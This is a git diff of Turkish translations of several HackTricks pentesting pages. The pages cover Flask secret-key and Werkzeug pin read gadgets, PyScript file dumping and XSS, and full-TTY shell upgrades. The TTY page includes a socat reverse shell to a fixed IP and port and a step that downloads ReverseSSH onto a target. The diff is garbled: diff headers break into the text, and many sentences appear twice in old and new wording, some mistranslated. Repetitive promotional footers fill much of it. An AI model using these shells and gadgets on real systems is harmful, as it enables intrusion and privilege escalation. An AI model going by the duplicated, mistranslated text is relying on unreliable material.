Bu nedenle, ana sayfada **tanımlanan Flask uygulama global nesnesine erişemezsiniz**, bu nesne **gizli anahtarı** tanımladı:
```python
app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
```
Bu senaryoda, ana dosyaya erişmek için dosyalar arasında gezinmek için bir cihaza ihtiyacınız var ve Flask gizli anahtarını değiştirmek ve bu anahtarı bilerek ayrıcalıkları yükseltmek için global nesne `app.secret_key`'e **erişmeniz gerekmektedir**.
Bu senaryoda, Flask gizli anahtarını değiştirmek ve bu anahtarı bilerek ayrıcalıkları yükseltmek için ana dosyaya erişmek için dosyalara gezinmek için bir araca ihtiyacınız vardır. Bu aracı kullanarak, Flask gizli anahtarını değiştirebilir ve [bu anahtarı bilerek ayrıcalıkları yükseltebilirsiniz](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
Bu yazıdan bir örnek payload:
Bu yazıdan bir örnek gibi bir yük: [bu yazıdan](https://ctftime.org/writeup/36082):
{% code overflow="wrap" %}
```python
@ -285,11 +254,11 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
```
{% endcode %}
`app.secret_key`'i (uygulamanızdaki adı farklı olabilir) değiştirmek için bu payload'u kullanın, böylece yeni ve daha fazla yetkiye sahip flask çerezlerini imzalayabilirsiniz.
Bu payload'ı kullanarak **`app.secret_key`**'i (uygulamanızdaki adı farklı olabilir) değiştirin ve daha fazla ayrıcalıklı flask çerezlerini imzalayabilin.
</details>
Ayrıca, daha fazla salt okunur gadget için aşağıdaki sayfayı da kontrol edin:
Yalnızca daha fazla salt okunur cihazlar için aşağıdaki sayfayı da kontrol edin:
{% content-ref url="python-internal-read-gadgets.md" %}
[python-internal-read-gadgets.md](python-internal-read-gadgets.md)
@ -299,16 +268,17 @@ Ayrıca, daha fazla salt okunur gadget için aşağıdaki sayfayı da kontrol ed
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,24 +1,25 @@
# Pyscript
# PyScript
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## PyScript Pentesting Rehberi
## PyScript Pentesting Kılavuzu
PyScript, Python'u HTML ile entegre etmek için geliştirilen yeni bir çerçevedir, bu nedenle HTML ile birlikte kullanılabilir. Bu hile yaprağında, penetrasyon testi amaçlarınız için PyScript'in nasıl kullanılacağını bulacaksınız.
PyScript, Python'un HTML ile entegre edilmesi için geliştirilen yeni bir çerçevedir, böylece HTML ile birlikte kullanılabilir. Bu hile yaprağında, penetrasyon testi amaçlarınız için PyScript'in nasıl kullanılacağını bulacaksınız.
### Emscripten sanal bellek dosya sistemi üzerinden dosya dökme / alımı:
### Emscripten sanal bellek dosya sistemi üzerinden dosyaların dökülmesi / alınması:
`CVE Kimliği: CVE-2022-30286`\
\
@ -53,7 +54,7 @@ Sonuç:
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
### Cross Site Scripting (Normal)
### Cross Site Scripting (Sıradan)
Kod:
```python
@ -65,7 +66,7 @@ Sonuç:
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
### Cross Site Scripting (Python Obfuscated)
### Cross Site Scripting (Python Karıştırılmış)
Kod:
```python
@ -108,16 +109,17 @@ Sonuç:
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,35 +1,36 @@
# Python İçsel Okuma Araçları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Temel Bilgiler
[**Python Format Dizeleri**](bypass-python-sandboxes/#python-format-string) veya [**Sınıf Kirliliği**](class-pollution-pythons-prototype-pollution.md) gibi farklı zayıflıklar, **python içsel verilerini okumanıza izin verebilir, ancak kodu yürütmenize izin vermeyebilir**. Bu nedenle, bir pentester, bu okuma izinlerinden **duyarlı ayrıcalıklar elde etmek ve zayıflığı yükseltmek** için en iyi şekilde yararlanmalıdır.
[**Python Format Strings**](bypass-python-sandboxes/#python-format-string) veya [**Sınıf Kirliliği**](class-pollution-pythons-prototype-pollution.md) gibi farklı zafiyetler size **Python iç verilerini okuma imkanı sağlayabilir ancak kodu yürütmenize izin vermeyebilir**. Bu nedenle, bir pentester'ın bu okuma izinlerinden en iyi şekilde yararlanarak **duyarlı ayrıcalıkları elde etmesi ve zafiyeti yükseltmesi gerekecektir**.
### Flask - Gizli anahtarı okuma
Bir Flask uygulamasının ana sayfasında, bu **gizli anahtarın yapılandırıldığı** **`app`** global nesnesi olabilir.
Bir Flask uygulamasının ana sayfasında muhtemelen **`app`** global nesnesi bulunur ve bu nesne üzerinde **gizli anahtar yapılandırılmış olabilir**.
```python
app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
```
Bu durumda, [Python kum havuzlarını atlatma sayfasından](bypass-python-sandboxes/) herhangi bir araç kullanarak bu nesneye erişmek mümkündür.
Bu durumda, bu nesneye erişmek için sadece herhangi bir araca sahip olmak mümkündür ve [**Python kum havuzlarını atlatma sayfasından**](bypass-python-sandboxes/) **global nesnelere erişmek** mümkündür.
**Zafiyet başka bir Python dosyasında ise**, ana dosyaya ulaşmak için dosyaları gezinmek için bir araca ihtiyacınız vardır. Bu şekilde Flask gizli anahtarını değiştirerek [bu anahtarı bilerek](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) ayrıcalıkları yükseltebilirsiniz.
**Zafiyet farklı bir python dosyasında olduğunda**, ana dosyaya ulaşmak için dosyalar arasında gezinmek için bir araca ihtiyacınız vardır ve Flask gizli anahtarını değiştirmek ve [**bu anahtarı bilerek ayrıcalıkları yükseltmek** için](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) **global nesne `app.secret_key`'e erişmek** gerekir.
Bu yazıdan bir örnek yük:
Bu yazıdan bir payload gibi:
{% code overflow="wrap" %}
```python
@ -37,31 +38,32 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
```
{% endcode %}
Bu payload'ı kullanarak `app.secret_key`'i (uygulamanızdaki adı farklı olabilir) değiştirerek yeni ve daha fazla yetkiye sahip flask çerezlerini imzalayabilirsiniz.
Bu payload'ı kullanarak `app.secret_key`'i (uygulamanızdaki ad farklı olabilir) değiştirin ve yeni ve daha fazla ayrıcalıklı flask çerezlerini imzalayabilin.
### Werkzeug - machine\_id ve node uuid
[**Bu yazıdan bu payload'ı kullanarak**](https://vozec.fr/writeups/tweedle-dum-dee/) **machine\_id** ve **uuid** düğümüne erişebilirsiniz, bunlar [**Werkzeug pinini oluşturmak için**](../../network-services-pentesting/pentesting-web/werkzeug.md) ihtiyaç duyduğunuz **ana sırlardır**. Eğer **hata ayıklama modu etkinse**, `/console` içinde python konsoluna erişmek için kullanabileceğiniz Werkzeug pinini oluşturabilirsiniz:
[**Bu yazıdan bu payload'ı kullanarak**](https://vozec.fr/writeups/tweedle-dum-dee/) **machine\_id** ve **uuid** düğmesine erişebilecek ve [**Werkzeug pinini oluşturmak için gereken ana sırlara**](../../network-services-pentesting/pentesting-web/werkzeug.md) erişebileceksiniz. Bu pin'i kullanarak `/console` içinde python konsoluna erişebilirsiniz eğer **hata ayıklama modu etkinse:**
```python
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
```
{% hint style="warning" %}
Dikkat, `app.py` dosyasının **sunucunun yerel yolunu** alabilirsiniz, web sayfasında bir **hata** oluşturarak yolunuzu **elde edebilirsiniz**.
**Sunucunun yerel yolunu** `app.py` **dosyasına** ulaşmak için web sayfasında **bazı hatalar oluşturarak** yolunuzu **alabilirsiniz**.
{% endhint %}
Eğer zafiyet başka bir python dosyasında ise, ana python dosyasından nesnelere erişmek için önceki Flask hilesine bakın.
Eğer zafiyet farklı bir python dosyasında ise, ana python dosyasından nesnelere erişmek için önceki Flask hilesini kontrol edin.
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>**HackTricks'i Destekleyin**</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) **kontrol edin**!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) **katılın** veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin**.
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) **ve** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun**.
</details>
{% endhint %}

View file

@ -1,23 +1,24 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Ailesi'ni keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna katılın**](https://t.me/peass) veya bizi **Twitter'da takip edin** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# [**Kabuklar - Linux**](linux.md)
# [**Kabuklar - Windows**](windows.md)
# [**MSFVenom - Hile Sayfası**](msfvenom.md)
# [**MSFVenom - Hile Kağıdı**](msfvenom.md)
# [**Tam TTY'ler**](full-ttys.md)
@ -36,16 +37,17 @@ HackTricks'ı desteklemenin diğer yolları:
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Ailesi'ni keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna katılın**](https://t.me/peass) veya bizi **Twitter'da takip edin** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# Tam TTY'ler
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* Hacking püf noktalarını paylaşarak PR'ler göndererek [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Tam TTY
`SHELL` değişkeninde ayarladığınız kabuk **mutlaka** _**/etc/shells**_ içinde **listelenmiş olmalıdır** veya `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported` hatası alırsınız. Ayrıca, aşağıdaki kod parçalarının sadece bash'te çalıştığını unutmayın. Eğer zsh kullanıyorsanız, kabuğu elde etmeden önce `bash` komutunu çalıştırarak bash'e geçin.
`SHELL` değişkeninde ayarladığınız kabuğun **mutlaka** _**/etc/shells**_ içinde **listelenmiş olması gerektiğini** unutmayın veya `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Ayrıca, aşağıdaki kod parçalarının sadece bash'te çalıştığını unutmayın. Eğer zsh kullanıyorsanız, kabuğu elde etmeden önce `bash` komutunu çalıştırarak bash'e geçin.
#### Python
@ -42,18 +43,6 @@ script /dev/null -qc /bin/bash #/dev/null is to not store anything
{% endcode %}
#### socat
Socat, birçok farklı ağ protokolünü destekleyen bir veri iletişim programıdır. Bu program, TCP/IP, UDP, SSL, IPv6 ve daha birçok protokolü destekler. Socat, birçok farklı kullanım senaryosunda kullanılabilir ve birçok farklı işlevi yerine getirebilir. Bu nedenle, bir hedef sistemde tam bir TTY kabuğu oluşturmak için kullanılabilir.
Socat kullanarak tam bir TTY kabuğu oluşturmak için aşağıdaki komutu kullanabilirsiniz:
```bash
socat file:`tty`,raw,echo=0 tcp-listen:<port>
```
Bu komut, belirtilen bağlantı noktasını dinleyen bir TCP soketi oluşturur ve gelen bağlantıları yerel bir TTY'ye yönlendirir. Bu sayede, hedef sistemde tam bir TTY kabuğu elde edebilirsiniz.
Socat'ı kullanarak tam bir TTY kabuğu oluşturmak, hedef sistemdeki birçok işlemi gerçekleştirmenizi sağlar. Bu sayede, hedef sistemdeki dosyaları okuyabilir, yazabilir ve değiştirebilir, komutlar çalıştırabilir ve hedef sistemdeki diğer ağ servislerine erişebilirsiniz.
```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
@ -76,13 +65,13 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
* vi: `:set shell=/bin/bash:shell`
* nmap: `!sh`
## ReverseSSH
## Ters SSH
Hedefe **etkileşimli kabuk erişimi**, **dosya transferleri** ve **port yönlendirmesi** için uygun bir yol, ReverseSSH adlı statik olarak bağlanmış ssh sunucusunu hedefe bırakmaktır.
**Etkileşimli kabuk erişimi**, **dosya transferleri** ve **port yönlendirmesi** için uygun bir yol, statik olarak bağlanmış ssh sunucusunu [ReverseSSH](https://github.com/Fahrj/reverse-ssh) hedefe bırakmaktır.
Aşağıda, upx sıkıştırılmış ikili dosyalarla birlikte `x86` için bir örnek bulunmaktadır. Diğer ikili dosyalar için [sürümler sayfasına](https://github.com/Fahrj/reverse-ssh/releases/latest/) bakın.
Aşağıda, `x86` için upx-sıkıştırılmış ikili dosyalar için bir örnek bulunmaktadır. Diğer ikili dosyalar için [sürümler sayfasına](https://github.com/Fahrj/reverse-ssh/releases/latest/) bakın.
1. Yerel olarak ssh port yönlendirme isteğini yakalamak için hazırlık yapın:
1. SSH port yönlendirme isteğini yakalamak için yerel olarak hazırlık yapın:
{% code overflow="wrap" %}
```bash
@ -94,8 +83,6 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
{% endcode %}
* (2a) Linux hedefi:
{% code overflow="wrap" %}
```bash
